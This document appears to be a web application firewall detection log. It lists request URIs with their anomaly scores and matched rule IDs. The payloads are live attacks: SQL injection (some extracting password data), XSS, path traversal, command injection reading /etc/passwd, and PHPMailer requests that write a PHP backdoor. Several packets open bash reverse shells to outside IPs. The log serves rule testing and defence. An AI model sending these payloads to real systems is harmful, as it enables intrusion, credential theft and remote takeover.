Packet [128]	Uri [/UDDISecurityService/UDDISecurityImplBean?<SOAP-ENV:Envelope%20xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"%20xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"%20xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"%20xmlns:xsd="http://www.w3.org/2001/XMLSchema">%20<SOAP-ENV:Body>%20<m:deletePermissionById%20xmlns:m="http://sap.com/esi/uddi/ejb/security/">%20<permissionId>x'%20AND%201=(SELECT%20COUNT(*)%20FROM%20BC_UDV3_EL8EM_KEY)%20or%20'1'='1</permissionId>%20</m:deletePermissionById>%20</SOAP-ENV:Body>%20</SOAP-ENV:Envelope>]	PLmin [4]	Score [20]	Nattacks [25]	[920273]	[933161]	[941100]	[941130]	[941340]	[942100]	[942110]	[942130]	[942150]	[942180]	[942200]	[942210]	[942310]	[942330]	[942370]	[942390]	[942400]	[942410]	[942480]	[942430]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [129]	Uri [/ajax.cgi?action=tag_ipPing&pip=8.8.8.8%26echo%20test%20OS-Injection%26&cache=false&time=1498503087110]	PLmin [4]	Score [10]	Nattacks [6]	[920273]	[932100]	[932110]	[942432]	[949110]	[980130]
Packet [130]	Uri [/simpleupload.py?$'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"'%0abash%20-i%20>%26%20/dev/tcp/8.8.8.8/443%200>%261%0aecho%20'&]	PLmin [2]	Score [15]	Nattacks [13]	[920272]	[920273]	[921151]	[932100]	[932110]	[932160]	[942110]	[942260]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [133]	Uri [/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf%20'QNAPVJBD%08d%16s%20%2014`(echo;id)>&2`'%20$(expr%20$(date%20+%s)%20%%20100000000)%20Disconnect|base64|tr%20-d%20'rn')]	PLmin [2]	Score [33]	Nattacks [15]	[920220]	[920271]	[920272]	[920273]	[932100]	[932105]	[932110]	[932130]	[941130]	[942260]	[942430]	[942431]	[942432]	[949110]	[980130]
Packet [134]	Uri [/cgi-bin/diagnostics?tsrEmailCurrent=true&currentTSREmailTo=|date>/tmp/xort||a%20%23]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[932110]	[942120]	[942432]	[949110]	[980130]
Packet [135]	Uri [/cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[932110]	[942120]	[942432]	[949110]	[980130]
Packet [136]	Uri [/ping.cgi?DIA_IPADDRESS=8.8.8.8;cat%20/etc/passwd]	PLmin [4]	Score [15]	Nattacks [6]	[920273]	[930120]	[932100]	[932160]	[949110]	[980130]
Packet [138]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/172.16.74.129/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com]	PLmin [2]	Score [20]	Nattacks [15]	[920273]	[932100]	[932160]	[933100]	[933161]	[933190]	[942160]	[942110]	[942150]	[942260]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [141]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20phpinfo();%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-X/var/www/html/uploads/phpcode.php%20%20some"@email.com]	PLmin [2]	Score [10]	Nattacks [11]	[920273]	[933100]	[933160]	[933190]	[942110]	[942260]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [143]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/8.8.8.8/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com]	PLmin [2]	Score [20]	Nattacks [15]	[920273]	[932100]	[932160]	[933100]	[933161]	[933190]	[942160]	[942110]	[942150]	[942260]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [147]	Uri [/phpmailer/contact_form.php?action=send&msg=<?php%20sleep(3);%20system("/bin/bash%20-c%20'nohup%20bash%20-i%20>/dev/tcp/172.16.74.129/1337%200<&1%202>&1'%20");%20%20?>&name=Jas%20Fasola&email="attacker"%20-oQ/tmp/%20-Xupload/phpbackdoor3085.php%20"@email.com]	PLmin [2]	Score [20]	Nattacks [15]	[920273]	[932100]	[932160]	[933100]	[933161]	[933190]	[942160]	[942110]	[942150]	[942260]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [148]	Uri [/zikula4/jcss.php?f=..........userdatatmp.txt]	PLmin [3]	Score [0]	Nattacks [1]	[942460]
Packet [151]	Uri [/es/index.php?option=com_virtuemart&view=categorysearch%27+%2F+sleep%285%29+%2F+%27&task=smartSearch]	PLmin [2]	Score [10]	Nattacks [12]	[920273]	[933161]	[942100]	[942160]	[942110]	[942150]	[942260]	[942410]	[942460]	[942432]	[949110]	[980130]
Packet [153]	Uri [/sources/item.query.php?type=action_on_quick_icon&id=(SELECT%20(CASE%20WHEN%20(6144=6144)%20THEN%206144%20ELSE%206144*(SELECT%206144%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&action=1]	PLmin [2]	Score [20]	Nattacks [15]	[920273]	[942100]	[942140]	[942190]	[942360]	[942130]	[942200]	[942260]	[942310]	[942330]	[942380]	[942431]	[942432]	[949110]	[980130]
Packet [154]	Uri [/sources/view.query.php?type=connections_logs&order=(SELECT%20(CASE%20WHEN%20(6688=6688)%20THEN%206688%20ELSE%206688*(SELECT%206688%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))&direction=DESC]	PLmin [2]	Score [20]	Nattacks [15]	[920273]	[942100]	[942140]	[942190]	[942360]	[942130]	[942200]	[942260]	[942310]	[942330]	[942380]	[942431]	[942432]	[949110]	[980130]
Packet [155]	Uri [/sources/view.query.php?type=connections_logs&order=date%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))vhPw)&direction=DESC]	PLmin [2]	Score [5]	Nattacks [10]	[920273]	[933161]	[942160]	[942150]	[942200]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [156]	Uri [/sources/view.query.php?type=errors_logs&order=date&direction=,%20%20(SELECT%20(CASE%20WHEN%20(1739=1739)%20THEN%201739%20ELSE%201739*(SELECT%201739%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS)%20END))]	PLmin [2]	Score [15]	Nattacks [15]	[920273]	[942140]	[942190]	[942360]	[942130]	[942200]	[942260]	[942310]	[942330]	[942380]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [157]	Uri [/yeager/y.php/tab_USERLIST?win_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&lh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=1%20and%201=1&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [160]	Uri [/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title="<script>alert(1)</script>&content=<script>alert(1)</script>&author=<script>alert(1)</script>SATAN&visibility=1&type=1&comm=0]	PLmin [2]	Score [50]	Nattacks [13]	[920273]	[941100]	[941110]	[941160]	[941320]	[942100]	[942110]	[942130]	[942260]	[942431]	[942432]	[949110]	[980130]
Packet [161]	Uri [/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=1&title=&content=&author=<script>alert(666)</script>&visibility=1&type=1&comm=0]	PLmin [2]	Score [15]	Nattacks [10]	[920273]	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942432]	[949110]	[980130]
Packet [162]	Uri [/ZCMS_1.1/ZCMS_1.1/?dir=login&username=admin&pass=HELL'%20OR%20'2'='2]	PLmin [2]	Score [5]	Nattacks [10]	[920273]	[942100]	[942130]	[942180]	[942330]	[942370]	[942390]	[942432]	[949110]	[980130]
Packet [163]	Uri [/cgit/blob/cgit.c?mimetype=text/html%0d%0a%0d%0a<script>xss</script>]	PLmin [2]	Score [15]	Nattacks [12]	[920272]	[920273]	[921151]	[941100]	[941110]	[941160]	[941320]	[942130]	[942460]	[942432]	[949110]	[980130]
Packet [164]	Uri [/cgi-bin/dna/sysAdmin.cgi?$'investigator=&username=&navUserName=&investigator=&username=&executeCmdData=uname%20-a&Action=executeCmd']	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[921180]	[932150]	[942110]	[942432]	[949110]	[980130]
Packet [172]	Uri [/fosagent/repl/download-file?basedir=4&filepath=....Windowswin.ini]	PLmin [3]	Score [0]	Nattacks [1]	[942460]
Packet [173]	Uri [/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'%20IF(UNICODE(SUBSTRING((SELECT%20TOP%201%20ISNULL(CAST(name%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20master..sysdatabases%20WHERE%20name%20NOT%20IN%20(SELECT%20TOP%207%20name%20FROM%20master..sysdatabases%20ORDER%20BY%20name)%20ORDER%20BY%20name),5,1))>104)%20WAITFOR%20DELAY%20'0:0:1'--%20qvAV&after=1523013041889&lang=de&_dc=1523013101769]	PLmin [2]	Score [15]	Nattacks [22]	[920273]	[942100]	[942140]	[942280]	[942120]	[942150]	[942200]	[942260]	[942300]	[942340]	[942380]	[942410]	[942470]	[942480]	[942430]	[942440]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [174]	Uri [/cgi-bin/CGIProxy.fcgi?cmd=asd&usr=asd&pwd=asd&remoteIp=`python%20-c%20"print%20('A'*266%20+%20'x9cx32')"`]	PLmin [2]	Score [15]	Nattacks [16]	[920273]	[932105]	[932115]	[933161]	[942100]	[942110]	[942260]	[942340]	[942370]	[942430]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [175]	Uri [/ladder/stats.php?game=W2BN&type=1&user=cat%20/etc/passwd]	PLmin [4]	Score [10]	Nattacks [5]	[920273]	[930120]	[932160]	[949110]	[980130]
Packet [176]	Uri [/ladder/stats.php?game=cat%20/etc/passwd&type=cat%20/etc/passwd&sortBy=username&sort_direction=cat%20/etc/passwd]	PLmin [4]	Score [30]	Nattacks [5]	[920273]	[930120]	[932160]	[949110]	[980130]
Packet [177]	Uri [/get_sec.php?q=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [179]	Uri [/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=1%20and%201=1&user_id=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=gift&starts=100&ends=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=home&category=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=pindisplay&uid=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=search&serachVal=1%20and%201=1::/www/index.php?option=com_socialpinboard&view=likes&uid=1%20and%201=1]	PLmin [2]	Score [10]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [181]	Uri [/images//lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20]	PLmin [2]	Score [15]	Nattacks [17]	[920273]	[933161]	[942100]	[942140]	[942190]	[942150]	[942310]	[942380]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [183]	Uri [/page1-%bf%bf"-page1/'%20AND%20(SELECT%207988%20FROM(SELECT%20COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'WpDn'='WpDn]	PLmin [3]	Score [0]	Nattacks [2]	[920272]	[933161]
Packet [184]	Uri [/api/sms_check.php?param=1%27and%20extractvalue(1,concat(0x7e,user()))%23]	PLmin [2]	Score [10]	Nattacks [13]	[920273]	[942100]	[942190]	[942150]	[942180]	[942300]	[942370]	[942410]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [185]	Uri [/index.php/community/?wpfd=0&wpfob=relevancy&wpfo=desc%2c(select*from(select(sleep(20)))a)&wpfs=fff&wpfin=entire-posts]	PLmin [2]	Score [5]	Nattacks [10]	[920273]	[933161]	[942160]	[942150]	[942200]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [188]	Uri [/?page_id=2&eventyear=2015%20AND%201=1%20)--&dateset=on&eventday=1]	PLmin [2]	Score [5]	Nattacks [9]	[920273]	[942100]	[942130]	[942210]	[942400]	[942460]	[942432]	[949110]	[980130]
Packet [191]	Uri [/wordpress/wp-admin/admin.php?page=gallery_with_slideshow&val=view&gid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [192]	Uri [/wordpress/wp-admin/edit.php?page=eventr%2Fattendees.php&event=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [193]	Uri [/wordpress/wp-admin/edit.php?page=eventr%2Fevent_form.php&event=1%20and%201=1&action=edit]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [194]	Uri [/wordpress/wp-admin/edit.php?page=surveys%2Fsurvey_form.php&survey=1%20and%201=1&action=edit]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [195]	Uri [/wordpress/wp-admin/edit.php?page=surveys%2Fquestion.php&survey=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [196]	Uri [/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [197]	Uri [/wp-admin/admin.php?page=rk_user_lists&info=del&did=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [198]	Uri [/wp-admin/options-general.php?page=wordpress-gallery-transformation/gallery.php&picnj=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [199]	Uri [/wp-admin/upload.php?_wpnonce=daab7cfabf&action=delete&media%5B%5D=5%20%251%24%25s%20hello]	PLmin [2]	Score [0]	Nattacks [4]	[920230]	[920272]	[920273]	[942432]
Packet [200]	Uri [/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=-1+UNION+ALL+SELECT+NULL,@@VERSION,NULL,NULL--::/wordpress/wp-admin/admin.php?page=wpdevart_gallery_themes&task=add_edit_theme&id=1+and+1=0]	PLmin [2]	Score [20]	Nattacks [16]	[920273]	[921180]	[942100]	[942190]	[942360]	[942260]	[942310]	[942361]	[942400]	[942480]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [202]	Uri [/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timeline=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [203]	Uri [/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2::/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))::/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)::/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)]	PLmin [2]	Score [60]	Nattacks [28]	[920273]	[921180]	[933161]	[941340]	[942100]	[942160]	[942170]	[942130]	[942150]	[942180]	[942200]	[942260]	[942300]	[942310]	[942330]	[942370]	[942380]	[942400]	[942410]	[942480]	[942430]	[942450]	[942490]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [204]	Uri [/esiclivre/restrito/inc/lkpcep.php?q=AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5-(IF(ORD(MID((SELECT%20DISTINCT(HEX(IFNULL(CAST(schema_name%20AS%20CHAR),0x20)))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%2013,1),11,1))>1,0,5)))))oslN)--%20UACx]	PLmin [2]	Score [10]	Nattacks [18]	[920273]	[933161]	[942140]	[942190]	[942150]	[942200]	[942260]	[942310]	[942330]	[942380]	[942410]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [205]	Uri [/recept.php?id=-1%20union%20select%20user()]	PLmin [2]	Score [15]	Nattacks [12]	[920273]	[942100]	[942190]	[942360]	[942150]	[942260]	[942361]	[942410]	[942480]	[942432]	[949110]	[980130]
Packet [206]	Uri [/playlists.php?playlist='%20UNION%20SELECT%20null,concat(0x223c2f613e3c2f64%2069763e3c2f6469763e,version(),0%20x3c212d2d),null,null,null,null%20,null,null,null,null,null--%20-]	PLmin [2]	Score [15]	Nattacks [17]	[920273]	[942100]	[942190]	[942360]	[942110]	[942150]	[942260]	[942361]	[942410]	[942480]	[942440]	[942450]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [207]	Uri [/phpCollab-v2.5.1/newsdesk/newsdesk.php?action=show&id=1%20and%20ascii(substr(md5(1),1,1))=99&PHPSESSID=aoanbk4f8dl89trecdir46dq82]	PLmin [2]	Score [10]	Nattacks [11]	[920273]	[933161]	[942100]	[942150]	[942300]	[942410]	[942431]	[942432]	[943120]	[949110]	[980130]
Packet [208]	Uri [/index.php?option=com_tag&amp;task=tag&amp;tag=-`1%20and%201=1--]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [210]	Uri [/category.php?id=1%20and%201=1::/www/author.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [211]	Uri [/index.php?cmd=agent&mod=true&ID=1%20and%201=1::/www/index.php?cmd=client_master&mod=true&ID=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [212]	Uri [/browse-scategory.php?sc=1%20and%201=1::/www/service-provider.php?ser=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [214]	Uri [/index.php?option=com_ns_downloadshop&amp;task=invoice.create&amp;id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [215]	Uri [/index.php?option=com_zhyandexmap&amp;view=zhyandexmap&amp;tmpl=component&amp;id=3&amp;placemarklistid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [216]	Uri [/admin/users/?sort=login&edit=1%20and%201=1::/www/admin/template/?edit=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[932190]	[942130]	[942400]	[942432]
Packet [217]	Uri [/phpsqlsearch_genxml.php?subcategory=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [219]	Uri [/index.php?page=news&nid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [220]	Uri [/viewprofile.php?profid=1%20and%201=1::/www/viewmessage.php?sender_id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [221]	Uri [/admin/members_view.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [222]	Uri [/add_to_cart.php?product_id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [223]	Uri [/admin/editadgroup.php?groupid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [224]	Uri [/office_admin/?pid=95&action=print_charactercertificate&id=1%20and%201=1::/www/office_admin/?pid=95&action=edit&id=31%20and%201=1]	PLmin [2]	Score [5]	Nattacks [9]	[920273]	[921180]	[932190]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [225]	Uri [/?photo=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [226]	Uri [/index.php?action=lookup-county&state=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [227]	Uri [/admin/admin_process.php?act=editpollform&id=1%20and%201=1::/www/admin/admin_process.php?act=cateditform&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [229]	Uri [/index.php?S=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [230]	Uri [/product_view1.php?pid=1%20and%201=1::/www/productcompanyinfo.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [231]	Uri [/rate.php?value=1%20and%201=1::/www/content.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [232]	Uri [/index.php?nice_theme=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [233]	Uri [/resources.php?action=category&sort=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [234]	Uri [/searchCommercial.php?property_type=1%20and%201=1&city=1%20and%201=1&posted_by=1%20and%201=1::/www/searchResidential.php?property_type=1%20and%201=1&city=1%20and%201=1&bedroom=1%20and%201=1]	PLmin [2]	Score [20]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [235]	Uri [/status_list.php?status_id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [236]	Uri [/restaurant-menu.php?resid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [237]	Uri [/view/friend_profile.php?friend_type=Student&friend_index=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [238]	Uri [/single.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [239]	Uri [/listings.php?catid=1%20and%201=1::/www/ads-details.php?ID=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [240]	Uri [/show-flight-result.php?fl_orig=1%20and%201=1::/www/show-flight-result.php?fl_dest=1%20and%201=1::/www/pages.php?id=1%20and%201=1::/www/content.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [6]	[920273]	[942130]	[942400]	[942430]	[942431]	[942432]
Packet [242]	Uri [/product.php?id=1%20and%201=1::/www/search.php?category_id=1&sub_category_id=1%20and%201=1::/www/search.php?category_id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [243]	Uri [/searchJob.php?jobType=1%20and%201=1&jobFrequency=1%20and%201=1]	PLmin [2]	Score [10]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [244]	Uri [/item_details.php?id=1%20and%201=1::/www/vendor_details.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [245]	Uri [/browse-category.php?cat=1%20and%201=1::/www/browse-scategory.php?sc=1%20and%201=1::/www/service-provider.php?ser=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [246]	Uri [/search_item.php?search=1%20and%201=1::/www/general_item_details.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [247]	Uri [/latest_news_details.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [248]	Uri [/profile.php?u=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [249]	Uri [/group.php?grid=1%20and%201=1::/www/profile.php?fid=1%20and%201=1::/www/company_details.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [250]	Uri [/itechd.php?productid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [251]	Uri [/show-flight-result.php?&fl_orig=1%20and%201=1::/www/show-flight-result.php?fl_dest=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [252]	Uri [/Employer_Details.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [253]	Uri [/subpage.php?scat=1%20and%201=1::/www/message.php?pid=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [254]	Uri [/catcompany.php?token=1%20and%201=1::/www/buyleads-details.php?id=1%20and%201=1::/www/company/index.php?c=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [255]	Uri [/movie.php?f=1%20and%201=1::/www/tvshow.php?s=1%20and%201=1::/www/show_misc_video.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [256]	Uri [/browse-category.php?cat=1%20and%201=1::/www/browse-scategory.php?sc=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [257]	Uri [/single-cause.php?pid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [258]	Uri [/search.php?cat_id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [259]	Uri [/domain.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [260]	Uri [/list?gender=1%20and%201=1&main_search=::/www/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [9]	[920273]	[921180]	[932190]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [261]	Uri [/jobsearch_all.php?rid1=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [262]	Uri [/category_list.php?search=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [263]	Uri [/product-category.php?key=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [264]	Uri [/courselist.php?subcatid=1%20and%201=1::/www/courselist.php?popcourseid=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [265]	Uri [/product_details.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [266]	Uri [/service-list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [268]	Uri [/search-results.php?Projectmain=1%20and%201=1&search=::/www/search-results.php?proj_type=1%20and%201=1&search=::/www/search-results.php?searchtext=1%20and%201=1&search=::/www/search-results.php?sell_price=1%20and%201=1&search=::/www/search-results.php?maxprice=1%20and%201=1&search=::/www/search-results.php?maxprice=1%20and%201=1&search=]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [269]	Uri [/booker_details.php?sourcebus=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
